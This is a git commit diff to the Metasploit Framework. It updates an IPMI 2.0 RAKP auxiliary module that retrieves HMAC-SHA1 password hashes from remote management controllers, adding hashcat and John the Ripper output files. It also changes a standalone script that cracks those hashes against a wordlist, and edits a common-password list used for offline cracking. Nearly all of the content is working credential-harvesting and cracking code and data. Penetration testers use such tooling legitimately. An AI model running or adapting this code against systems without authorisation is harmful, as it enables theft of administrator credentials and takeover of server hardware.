Updated output formats, top 1000 passwords
parent
f0db04c2a6
commit
1e21f0e2aa
|
@ -14,6 +14,7 @@ xupamisto
|
|||
Letmein2
|
||||
1q2w3e4r
|
||||
111111
|
||||
|
||||
zero2hero
|
||||
admin123
|
||||
Flamenco
|
||||
|
@ -68,6 +69,7 @@ sun12345
|
|||
siemens123
|
||||
hpinvent
|
||||
goethe
|
||||
compaq
|
||||
cisco
|
||||
butt
|
||||
brian0711
|
||||
|
@ -89,7 +91,6 @@ redhat
|
|||
netnet
|
||||
letmein
|
||||
kalimera
|
||||
compaq
|
||||
carpediem
|
||||
blabla12
|
||||
blabla
|
||||
|
@ -315,10 +316,12 @@ stanley
|
|||
sofuck
|
||||
snickers
|
||||
skywalker
|
||||
simonb
|
||||
shin
|
||||
semmi
|
||||
sasman
|
||||
samsun
|
||||
salope
|
||||
salamander
|
||||
rutabaga
|
||||
rosedale
|
||||
|
@ -465,11 +468,9 @@ system32
|
|||
strasburg
|
||||
start123
|
||||
sofresh
|
||||
simonb
|
||||
setmefree
|
||||
seekanddestroy
|
||||
secure6
|
||||
salope
|
||||
root4
|
||||
roman123
|
||||
riobravo
|
||||
|
@ -518,6 +519,7 @@ number66
|
|||
nottelling
|
||||
nike2008
|
||||
n0d0ubt1
|
||||
mwmwmw
|
||||
mvemjsunp
|
||||
mustang70
|
||||
munchkin10
|
||||
|
@ -568,6 +570,7 @@ goldstar
|
|||
godblessyou
|
||||
getoutofhere
|
||||
genius123
|
||||
gbpltw
|
||||
freetown1
|
||||
freedom35
|
||||
fotos1
|
||||
|
@ -600,6 +603,7 @@ ciscocisco
|
|||
chile62
|
||||
check123
|
||||
ch4ng3m3
|
||||
cdvcdv
|
||||
catinthehat
|
||||
carla123
|
||||
calvin99
|
||||
|
@ -735,6 +739,7 @@ zero0zero
|
|||
zaq1xsw2cde3
|
||||
yyl
|
||||
yes90125
|
||||
xyuxyu
|
||||
xunlei
|
||||
xiazhi
|
||||
woelco
|
||||
|
@ -803,6 +808,7 @@ petert999
|
|||
pepson
|
||||
patrickb123
|
||||
password1`
|
||||
oqksad
|
||||
omfglol1
|
||||
ocnc123
|
||||
nttocn
|
||||
|
@ -816,7 +822,6 @@ netadmin
|
|||
net101
|
||||
nemtom1
|
||||
n0ttelling
|
||||
mwmwmw
|
||||
mupali
|
||||
mumuland
|
||||
mexx6399
|
||||
|
@ -859,7 +864,6 @@ gmmkh
|
|||
gigi99
|
||||
ghbdtnbr
|
||||
gfhjkmrf
|
||||
gbpltw
|
||||
g8keeper
|
||||
fuckbitchesgetmoney
|
||||
formeforme
|
||||
|
@ -877,6 +881,7 @@ ddemde
|
|||
darwin99
|
||||
daemon09
|
||||
d0m1n0
|
||||
cyphte
|
||||
cukorborso
|
||||
ctrls
|
||||
cti4ever
|
||||
|
@ -887,6 +892,7 @@ cmlslc
|
|||
changeme20
|
||||
cdwv
|
||||
cdn123
|
||||
ccaere
|
||||
cbtp
|
||||
cairell
|
||||
cabajka
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
##
|
||||
#
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'IPMI 2.0 RAKP Remote Password Hash Retreival',
|
||||
'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retreival',
|
||||
'Description' => %q|
|
||||
This module identifies IPMI 2.0 compatible systems and attempts to retrieve the
|
||||
HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
|
||||
|
@ -41,7 +41,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptPath.new('PASS_FILE', [ true, "File containing common passwords for offline cracking, one per line",
|
||||
File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_passwords.txt')
|
||||
]),
|
||||
OptString.new('OUTPUT_FILE', [false, "File to save captured password hashes into"]),
|
||||
OptString.new('OUTPUT_HASHCAT_FILE', [false, "Save captured password hashes in hashcat format"]),
|
||||
OptString.new('OUTPUT_JOHN_FILE', [false, "Save captured password hashes in john the ripper format"]),
|
||||
OptBool.new('CRACK_COMMON', [true, "Automatically crack common passwords as they are obtained", true])
|
||||
], self.class)
|
||||
|
||||
|
@ -95,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
unless r
|
||||
vprint_status("#{rhost} No response to IPMI open session request, stopping test")
|
||||
vprint_status("#{rhost} No response to IPMI open session request")
|
||||
rakp = nil
|
||||
break
|
||||
end
|
||||
|
||||
sess = process_opensession_reply(*r)
|
||||
unless sess
|
||||
vprint_status("#{rhost} Could not understand the response to the open session request, stopping test")
|
||||
vprint_status("#{rhost} Could not understand the response to the open session request")
|
||||
rakp = nil
|
||||
break
|
||||
end
|
||||
|
@ -164,12 +165,18 @@ class Metasploit3 < Msf::Auxiliary
|
|||
username
|
||||
)
|
||||
|
||||
found = "#{rhost} #{username}:#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}"
|
||||
sha1_salt = hmac_buffer.unpack("H*")[0]
|
||||
sha1_hash = rakp.hmac_sha1.unpack("H*")[0]
|
||||
|
||||
found = "#{rhost} #{username}:#{sha1_salt}:#{sha1_hash}"
|
||||
print_good(found)
|
||||
|
||||
# Write the rakp hash to the output file
|
||||
if @output
|
||||
@output.write(found + "\n")
|
||||
# Write the rakp hash to the output files
|
||||
if @output_cat
|
||||
@output_cat.write("#{rhost} #{username}:#{sha1_salt}:#{sha1_hash}\n")
|
||||
end
|
||||
if @output_jtr
|
||||
@output_jtr.write("#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}\n")
|
||||
end
|
||||
|
||||
# Write the rakp hash to the database
|
||||
|
@ -179,7 +186,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:proto => 'udp',
|
||||
:sname => 'ipmi',
|
||||
:user => username,
|
||||
:pass => "#{hmac_buffer.unpack("H*")[0]}:#{rakp.hmac_sha1.unpack("H*")[0]}",
|
||||
:pass => "#{sha1_salt}:#{sha1_hash}",
|
||||
:source_type => "captured",
|
||||
:active => true,
|
||||
:type => 'rakp_hmac_sha1_hash'
|
||||
|
@ -261,16 +268,22 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def setup
|
||||
super
|
||||
@output = nil
|
||||
if datastore['OUTPUT_FILE']
|
||||
@output = ::File.open(datastore['OUTPUT_FILE'], "ab")
|
||||
@output_cat = nil
|
||||
@output_jtr = nil
|
||||
if datastore['OUTPUT_HASHCAT_FILE']
|
||||
@output_cat = ::File.open(datastore['OUTPUT_HASHCAT_FILE'], "ab")
|
||||
end
|
||||
if datastore['OUTPUT_JOHN_FILE']
|
||||
@output_jtr = ::File.open(datastore['OUTPUT_JOHN_FILE'], "ab")
|
||||
end
|
||||
end
|
||||
|
||||
def cleanup
|
||||
super
|
||||
@output.close if @output
|
||||
@output = nil
|
||||
@output_cat.close if @output_cat
|
||||
@output_cat = nil
|
||||
@output_jtr.close if @output_jtr
|
||||
@output_jtr = nil
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -4,7 +4,10 @@
|
|||
#
|
||||
# This script cracks HMAC SHA1 hashes. It is strangely necessary as existing tools
|
||||
# have issues with binary salt values and extremely large salt values. The primary
|
||||
# goal of this tool is to handle IPMI 2.0 HMAC SHA1 hashes
|
||||
# goal of this tool is to handle IPMI 2.0 HMAC SHA1 hashes.
|
||||
#
|
||||
# Support for this format is being added to both hashcat and jtr, hopefully
|
||||
# making this code obsolete.
|
||||
#
|
||||
|
||||
msfbase = __FILE__
|
||||
|
@ -63,11 +66,12 @@ count = 0
|
|||
cracked = 0
|
||||
|
||||
word_fd.each_line do |line|
|
||||
line = line.unpack("C*").pack("C*").strip
|
||||
line = line.unpack("C*").pack("C*").sub(/\r?\n?$/, '')
|
||||
|
||||
next unless line.length > 0
|
||||
hashes.each do |hinfo|
|
||||
if OpenSSL::HMAC.digest('sha1', line, hinfo[1]) == hinfo[2]
|
||||
$stdout.puts "[+] CRACKED " + hinfo[0]+":"+line
|
||||
$stdout.puts [ hinfo[0], hinfo[1].unpack("H*").first, hinfo[2].unpack("H*").first, line ].join(":")
|
||||
$stdout.flush
|
||||
hinfo[3] = true
|
||||
cracked += 1
|
||||
|
|
Loading…
Reference in New Issue